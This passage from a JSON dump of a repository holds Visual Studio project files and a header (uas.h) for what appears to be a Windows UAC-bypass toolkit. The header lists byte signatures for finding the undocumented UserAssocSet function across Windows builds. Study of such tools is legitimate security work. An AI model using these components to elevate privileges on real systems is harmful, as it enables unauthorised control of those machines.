Include=\"..\\Shared\\u64tohex.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"methods\\api0cradle.c\">\n      <Filter>Source Files\\methods</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\u64tostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"methods\\comsup.c\">\n      <Filter>Source Files\\methods</Filter>\n    </ClCompile>\n    <ClCompile Include=\"methods\\rinn.c\">\n      <Filter>Source Files\\methods</Filter>\n    </ClCompile>\n    <ClCompile Include=\"methods\\dwells.c\">\n      <Filter>Source Files\\methods</Filter>\n    </ClCompile>\n    <ClCompile Include=\"appinfo\\x64\\appinfo64.c\">\n      <Filter>appinfo</Filter>\n    </ClCompile>\n    <ClCompile Include=\"appinfo\\x86-32\\appinfo32.c\">\n      <Filter>appinfo</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\windefend.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"stub.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"methods\\shellsup.c\">\n      <Filter>Source 
Files\\methods</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\hde\\hde64.c\">\n      <Filter>hde</Filter>\n    </ClCompile>\n    <ClCompile Include=\"methods\\azagarampur.c\">\n      <Filter>Source Files\\methods</Filter>\n    </ClCompile>\n    <ClCompile Include=\"pcasvc\\w8_10\\x64\\pcasvc64.c\">\n      <Filter>pcasvc\\w8_10</Filter>\n    </ClCompile>\n    <ClCompile Include=\"pcasvc\\w8_10\\x86-32\\pcasvc32.c\">\n      <Filter>pcasvc\\w8_10</Filter>\n    </ClCompile>\n    <ClCompile Include=\"pcasvc\\w7\\x64\\pcasvc7_64.c\">\n      <Filter>pcasvc\\w7</Filter>\n    </ClCompile>\n    <ClCompile Include=\"pcasvc\\w7\\x86-32\\pcasvc7_32.c\">\n      <Filter>pcasvc\\w7</Filter>\n    </ClCompile>\n    <ClCompile Include=\"fusutil.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"methods\\zcgonvh.c\">\n      <Filter>Source Files\\methods</Filter>\n    </ClCompile>\n    <ClCompile Include=\"console.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"methods\\antonioCoco.c\">\n      <Filter>Source Files\\methods</Filter>\n    </ClCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"global.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"sup.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"resource.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\minirtl.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\shared\\rtltypes.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"makecab.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"compress.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\_filename.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"tests\\test.h\">\n      
<Filter>testunits</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\ldr.h\">\n      <Filter>ldr</Filter>\n    </ClInclude>\n    <ClInclude Include=\"aic.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"encresource.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"methods\\comsup.h\">\n      <Filter>Source Files\\methods</Filter>\n    </ClInclude>\n    <ClInclude Include=\"methods\\elvint.h\">\n      <Filter>Source Files\\methods</Filter>\n    </ClInclude>\n    <ClInclude Include=\"methods\\methods.h\">\n      <Filter>Source Files\\methods</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\windefend.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\shared.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"stub.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\hde\\hde64.h\">\n      <Filter>hde</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\hde\\pstdint.h\">\n      <Filter>hde</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\hde\\table64.h\">\n      <Filter>hde</Filter>\n    </ClInclude>\n    <ClInclude Include=\"uas.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"fusutil.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"methods\\routines.h\">\n      <Filter>Source Files\\methods</Filter>\n    </ClInclude>\n    <ClInclude Include=\"console.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"Resource.rc\">\n      <Filter>Resource Files</Filter>\n    </ResourceCompile>\n    <ResourceCompile Include=\"bin32res.rc\">\n      <Filter>Resource Files</Filter>\n    </ResourceCompile>\n    <ResourceCompile Include=\"bin64res.rc\">\n      <Filter>Resource Files</Filter>\n   
 </ResourceCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <Image Include=\"akagi.ico\">\n      <Filter>Resource Files</Filter>\n    </Image>\n  </ItemGroup>\n  <ItemGroup>\n    <None Include=\"export.def\">\n      <Filter>Header Files</Filter>\n    </None>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "Source/Akagi/uacme.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"12.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternalConsole|Win32'\">\n    <LocalDebuggerCommandArguments />\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LocalDebuggerCommandArguments>78</LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternalConsole|x64'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LocalDebuggerCommandArguments>71</LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='DebugConsole|Win32'\">\n    <LocalDebuggerCommandArguments>71</LocalDebuggerCommandArguments>\n    
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n    <LocalDebuggerCommandArgumentsHistory>78|0|</LocalDebuggerCommandArgumentsHistory>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='DebugConsole|x64'\">\n    <LocalDebuggerCommandArguments>78</LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n</Project>"
  },
  {
    "path": "Source/Akagi/uas.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2021 - 2024\n*\n*  TITLE:       UAS.H\n*\n*  VERSION:     3.66\n*\n*  DATE:        22 Jul 2024\n*\n*  UserAssocSet signature file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n//\n// UserAssocSet patterns.\n//\n\n// mov r8, [rbx + 40h]\n// mov rdx, [rbx + 38h]\n// mov ecx, 1\n// call UserAssocSet\nstatic BYTE UserAssocSet_7601[] = {\n    0x4C, 0x8B, 0x43, 0x40, 0x48, 0x8B, 0x53, 0x38, 0xB9, 0x01, 0x00, 0x00, 0x00\n};\n\n// mov r8, rsi\n// mov rdx, rbx\n// mov ecx, 2\n// call UserAssocSet\nstatic BYTE UserAssocSet_9600[] = {\n    0x4C, 0x8B, 0xC6, 0x48, 0x8B, 0xD3, 0xB9, 0x02, 0x00, 0x00, 0x00\n};\n\n// imul rax, 4Eh\n// mov ecx, 2\n// add r8, rax\n// call UserAssocSet\nstatic BYTE UserAssocSet_14393[] = {\n    0x48, 0x6B, 0xC0, 0x4E, 0xB9, 0x02, 0x00, 0x00, 0x00, 0x4C, 0x03, 0xC0\n};\n\n// mov r8, rsi\n// mov r9d, ecx\n// mov rdx, r15\n// call UserAssocSet\nstatic BYTE UserAssocSet_17763_v1554[] = {\n    0x4C, 0x8B, 0xC6, 0x44, 0x8B, 0xC9, 0x49, 0x8B, 0xD7\n};\n\n// mov ecx, r9d\n// mov r8, rdi\n// mov rdx, rsi\n// call UserAssocSet\nstatic BYTE UserAssocSet_17763_v1728[] = {\n    0x41, 0x8B, 0xC9, 0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD6\n};\n\n// mov r9d, eax\n// mov ecx, eax\n// mov r8, rdi\n// mov rdx, rbp\n// call UserAssocSet\nstatic BYTE UserAssocSet_17763_v1971[] = {\n    0x44, 0x8B, 0xC8, 0x8B, 0xC8, 0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD5\n};\n\n// mov r9d, ecx\n// mov r8, rsi\n// mov rdx, r15\n// call UserAssocSet\nstatic BYTE UserAssocSet_18362[] = {\n    0x44, 0x8B, 0xC9, 0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD7\n};\n\n// mov r8, rdi\n// mov ecx, r9d\n// mov rdx, rsi\nstatic BYTE UserAssocSet_18362_v2[] = {\n    0x4C, 0x8B, 
0xC7, 0x41, 0x8B, 0xC9, 0x48, 0x8B, 0xD6\n};\n\n// mov r8, rsi\n// mov r9d, ecx\n// mov rdx, r15\n// call UserAssocSet\nstatic BYTE UserAssocSet_18363[] = {\n    0x4C, 0x8B, 0xC6, 0x44, 0x8B, 0xC9, 0x49, 0x8B, 0xD7\n};\n\n// mov r9d, ecx\n// mov r8, rsi\n// mov rdx, r15\n// call UserAssocSet\nstatic BYTE UserAssocSet_19041[] = {\n    0x44, 0x8B, 0xC9, 0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD7\n};\n\n// mov r8, rdi\n// mov rdx, rsi\n// mov ecx, r9d\n// call UserAssocSet\nstatic BYTE UserAssocSet_19042[] = {\n    0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD6, 0x41, 0x8B, 0xC9\n};\n\n// mov r8, rdi\n// mov rdx, rbp\n// mov ecx, eax\n// call UserAssocSet\nstatic BYTE UserAssocSet_19043_v1023[] = {\n    0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD5, 0x8B, 0xC8\n};\n\n// mov r8, rsi\n// mov rdx, r14\n// mov eax, ecx\n// call UserAssocSet\nstatic BYTE UserAssocSet_22000[] = {\n    0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD6, 0x8B, 0xC8\n};\n\n// mov r9d, ecx\n// mov r8, rdi\n// mov rdx, r14\n// call UserAssocSet\nstatic BYTE UserAssocSet_22621[] = {\n    0x44, 0x8B, 0xC9, 0x4C, 0x8B, 0xC7, 0x49, 0x8B, 0xD6\n};\n\n// mov r8, rsi\n// mov rdx, r15\n// lea ecx, [r9 + 2]\n// call UserAssocSet\nstatic BYTE UserAssocSet_26100[] = {\n    0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD7, 0x41, 0x8D, 0x49, 0x02\n};\n\n//\n// End of UserAssocSet patterns.\n//\n\n//\n// Windows 7 SP1 7601\n//\nUSER_ASSOC_PATTERN UAS_7601 = { UserAssocSet_7601, sizeof(UserAssocSet_7601) };\nPVOID UAS_PATTERN_TABLE_7601[] = { &UAS_7601 };\nUSER_ASSOC_SIGNATURE UAS_SIG_7601 = { NT_WIN7_SP1, NT_WIN7_SP1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_7601), &UAS_PATTERN_TABLE_7601 };\n\n//\n// Windows 8 (9600)\n//\nUSER_ASSOC_PATTERN UAS_9600 = { UserAssocSet_9600, sizeof(UserAssocSet_9600) };\nPVOID UAS_PATTERN_TABLE_9600[] = { &UAS_9600 };\nUSER_ASSOC_SIGNATURE UAS_SIG_9600 = { NT_WIN8_BLUE, NT_WIN8_BLUE, RTL_NUMBER_OF(UAS_PATTERN_TABLE_9600), &UAS_PATTERN_TABLE_9600 };\n\n//\n// Windows 10 1607 (14393)\n//\nUSER_ASSOC_PATTERN UAS_14393 = { UserAssocSet_14393, 
sizeof(UserAssocSet_14393) };\nPVOID UAS_PATTERN_TABLE_14393[] = { &UAS_14393 };\nUSER_ASSOC_SIGNATURE UAS_SIG_14393 = { NT_WIN10_REDSTONE1, NT_WIN10_REDSTONE1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_14393), &UAS_PATTERN_TABLE_14393 };\n\n//\n// Windows 10 1809 (17763)\n//\nUSER_ASSOC_PATTERN UAS_17763_1554 = { UserAssocSet_17763_v1554, sizeof(UserAssocSet_17763_v1554) };\nUSER_ASSOC_PATTERN UAS_17763_1728 = { UserAssocSet_17763_v1728, sizeof(UserAssocSet_17763_v1728) };\nUSER_ASSOC_PATTERN UAS_17763_1971 = { UserAssocSet_17763_v1971, sizeof(UserAssocSet_17763_v1971) };\nPVOID UAS_PATTERN_TABLE_17763[] = { &UAS_17763_1554, &UAS_17763_1728, &UAS_17763_1971 };\nUSER_ASSOC_SIGNATURE UAS_SIG_17763 = { NT_WIN10_REDSTONE5, NT_WIN10_REDSTONE5, RTL_NUMBER_OF(UAS_PATTERN_TABLE_17763), &UAS_PATTERN_TABLE_17763 };\n\n//\n// Windows 10 1903 (18362)\n//\nUSER_ASSOC_PATTERN UAS_18362 = { UserAssocSet_18362, sizeof(UserAssocSet_18362) };\nUSER_ASSOC_PATTERN UAS_18362_1350 = { UserAssocSet_18362_v2, sizeof(UserAssocSet_18362_v2) };\nPVOID UAS_PATTERN_TABLE_18362[] = { &UAS_18362, &UAS_18362_1350 };\nUSER_ASSOC_SIGNATURE UAS_SIG_18362 = { NT_WIN10_19H1, NT_WIN10_19H1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_18362), &UAS_PATTERN_TABLE_18362 };\n\n//\n// Windows 10 1909 (18363)\n//\nUSER_ASSOC_PATTERN UAS_18363 = { UserAssocSet_18363, sizeof(UserAssocSet_18363) };\nPVOID UAS_PATTERN_TABLE_18363[] = { &UAS_18363, &UAS_18362_1350 };\nUSER_ASSOC_SIGNATURE UAS_SIG_18363 = { NT_WIN10_19H2, NT_WIN10_19H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_18363), &UAS_PATTERN_TABLE_18363 };\n\n//\n// Windows 10 2004 (19041)\n//\nUSER_ASSOC_PATTERN UAS_19041 = { UserAssocSet_19041, sizeof(UserAssocSet_19041) };\nUSER_ASSOC_PATTERN UAS_19042_789 = { UserAssocSet_19042, sizeof(UserAssocSet_19042) }; //same as for 19042\nPVOID UAS_PATTERN_TABLE_19041[] = { &UAS_19041, &UAS_19042_789 };\nUSER_ASSOC_SIGNATURE UAS_SIG_19041 = { NT_WIN10_20H1, NT_WIN10_20H1, RTL_NUMBER_OF(UAS_PATTERN_TABLE_19041), &UAS_PATTERN_TABLE_19041 
};\n\n//\n// Windows 10 2009 (19042/19043/19044)\n//\nUSER_ASSOC_PATTERN UAS_19043 = { UserAssocSet_19043_v1023, sizeof(UserAssocSet_19043_v1023) };\nPVOID UAS_PATTERN_TABLE_19042_19043[] = { &UAS_19042_789, &UAS_19043 };\nUSER_ASSOC_SIGNATURE UAS_SIG_19042_19043 = { NT_WIN10_20H2, NT_WIN10_21H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_19042_19043), &UAS_PATTERN_TABLE_19042_19043 };\n\n// Windows 11 21H2 (22000)\nUSER_ASSOC_PATTERN UAS_22000 = { UserAssocSet_22000, sizeof(UserAssocSet_22000) };\nPVOID UAS_PATTERN_TABLE_22000[] = { &UAS_22000 };\nUSER_ASSOC_SIGNATURE UAS_SIG_22000 = { NT_WIN11_21H2 , NT_WIN11_21H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_22000), &UAS_PATTERN_TABLE_22000 };\n\n//\n// Windows 11 22H2-23H2 (22621/22631)\n//\nUSER_ASSOC_PATTERN UAS_22621 = { UserAssocSet_22621, sizeof(UserAssocSet_22621) };\nPVOID UAS_PATTERN_TABLE_22621[] = { &UAS_22621 };\nUSER_ASSOC_SIGNATURE UAS_SIG_22621 = { NT_WIN11_22H2, NT_WIN11_23H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_22621), &UAS_PATTERN_TABLE_22621 };\n\n//\n// Windows 11 24H2 (26100+)\n//\nUSER_ASSOC_PATTERN UAS_26100 = { UserAssocSet_26100, sizeof(UserAssocSet_26100) };\nPVOID UAS_PATTERN_TABLE_26100[] = { &UAS_26100 };\nUSER_ASSOC_SIGNATURE UAS_SIG_26100 = { NT_WIN11_24H2, NT_WIN11_24H2, RTL_NUMBER_OF(UAS_PATTERN_TABLE_26100), &UAS_PATTERN_TABLE_26100 };\n"
  },
  {
    "path": "Source/Akatsuki/Akatsuki.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"ReleaseInternal|x64\">\n      <Configuration>ReleaseInternal</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{07EF7652-1C2D-478B-BB4B-F9560695A387}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>Akatsuki</RootNamespace>\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\" Label=\"Configuration\">\n    
<ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)64</TargetName>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n    <EmbedManifest>false</EmbedManifest>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    
<LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)64</TargetName>\n    <EmbedManifest>false</EmbedManifest>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>$(ProjectName)64</TargetName>\n    <EmbedManifest>false</EmbedManifest>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>_DEBUG;_WINDOWS;_USRDLL;AKATSUKI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <CompileAs>CompileAsC</CompileAs>\n      <AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>DllMain</EntryPointSymbol>\n      <Version>6.0</Version>\n      <ModuleDefinitionFile>export.def</ModuleDefinitionFile>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      
<PreprocessorDefinitions>NDEBUG;_WINDOWS;_USRDLL;AKATSUKI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <BufferSecurityCheck>false</BufferSecurityCheck>\n      <CompileAs>CompileAsC</CompileAs>\n      <AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n      <EntryPointSymbol>DllMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <Version>6.0</Version>\n      <ModuleDefinitionFile>export.def</ModuleDefinitionFile>\n    </Link>\n    <PostBuildEvent>\n      <Command>\n      </Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>NDEBUG;_WINDOWS;_USRDLL;AKATSUKI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <BufferSecurityCheck>false</BufferSecurityCheck>\n      <CompileAs>CompileAsC</CompileAs>\n      <AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n      <EntryPointSymbol>DllMain</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <Version>6.0</Version>\n      <ModuleDefinitionFile>export.def</ModuleDefinitionFile>\n    </Link>\n    <PostBuildEvent>\n      
<Command>\\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\Akatsuki64.dll</Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"..\\Shared\\u64tohex.c\" />\n    <ClCompile Include=\"..\\Shared\\u64tostr.c\" />\n    <ClCompile Include=\"..\\Shared\\ultohex.c\" />\n    <ClCompile Include=\"..\\Shared\\ultostr.c\" />\n    <ClCompile Include=\"..\\Shared\\util.c\" />\n    <ClCompile Include=\"..\\Shared\\windefend.c\" />\n    <ClCompile Include=\"..\\Shared\\_strcat.c\" />\n    <ClCompile Include=\"..\\Shared\\_strcmpi.c\" />\n    <ClCompile Include=\"..\\Shared\\_strcpy.c\" />\n    <ClCompile Include=\"..\\Shared\\_strend.c\" />\n    <ClCompile Include=\"..\\Shared\\_strlen.c\" />\n    <ClCompile Include=\"..\\Shared\\_strncmp.c\" />\n    <ClCompile Include=\"..\\Shared\\_strncmpi.c\" />\n    <ClCompile Include=\"..\\Shared\\_strncpy.c\" />\n    <ClCompile Include=\"..\\Shared\\_strstri.c\" />\n    <ClCompile Include=\"dllmain.c\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\Shared\\rtltypes.h\" />\n    <ClInclude Include=\"..\\Shared\\shared.h\" />\n    <ClInclude Include=\"..\\Shared\\util.h\" />\n    <ClInclude Include=\"..\\Shared\\windefend.h\" />\n    <ClInclude Include=\"resource.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <None Include=\"export.def\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"version.rc\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "Source/Akatsuki/Akatsuki.vcxproj.filters",
